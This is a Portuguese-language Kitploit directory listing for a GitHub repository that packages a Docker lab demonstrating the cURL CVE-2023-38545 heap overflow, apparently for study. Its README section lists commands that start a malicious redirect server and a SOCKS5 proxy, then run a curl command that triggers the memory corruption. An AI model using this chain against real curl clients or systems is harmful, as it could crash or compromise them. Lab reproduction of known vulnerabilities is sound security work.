Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38545-sample — Dockerfile contendo todos os arquivos de configuração necessários para demonstrar o exploit. | Kitploit
Ferramentas/GitHubGitHub/vanigori/cve-2023-38545-sample
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoSegurança WebAprendizado e EducaçãoLabs e Prática
GitHubvanigori/cve-2023-38545-sample

CVE-2023-38545-sample

Dockerfile contendo todos os arquivos de configuração necessários para demonstrar o exploit.

Ver Repositório
32há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição rápida

Isso demonstra o cURL CVE-2023-38545. É o mais leve que pude fazer.

Configuração

Primeiro, construa a imagem Docker:

docker build . -t cveimage

Em seguida, podemos simplesmente executar o arquivo de imagem, criando um contêiner Docker temporário que será excluído quando o contêiner for parado:

docker run --rm --tty --net="host" --name cvecontainer cveimage

Se você estiver com dificuldade para digitar comandos, basta abrir outro terminal e executar:

docker exec -it cvecontainer /bin/bash

Agora, precisamos iniciar todos os serviços. Conecte-se ao contêiner já em execução e execute:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

Agora, de dentro do contêiner você pode ver o exploit do cURL em ação:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

Você deve ver um erro de segmentation fault na máquina que executou o comando curl para saber que o exploit foi bem-sucedido. Se você não o vir, ou o exploit não ocorreu, ou o processo tinha tanto espaço de heap disponível que você não sobrescreveu em memória inacessível.

Mais trabalho (PRs bem-vindos)

  • Deixar este README bonito
  • Configurar systemd para iniciar automaticamente o código de exploit
  • Reduzir o tempo e o tamanho da construção da imagem Docker
  • Qualquer outra coisa. . .?

Referências

  • O proxy socks5 não é feito por mim. O código original do proxy pode ser encontrado aqui: https://github.com/alexbers/tgsocksproxy
    • Originalmente explorado no ubuntu (wsl) com suporte a systemd: https://github.com/aire1/mtproxy_autoinstaller
  • O relatório do hackerone, que economizou toneladas de tempo de pesquisa. Leia isto se quiser entender como este exploit ocorre: https://hackerone.com/reports/2187833
Baixar ferramenta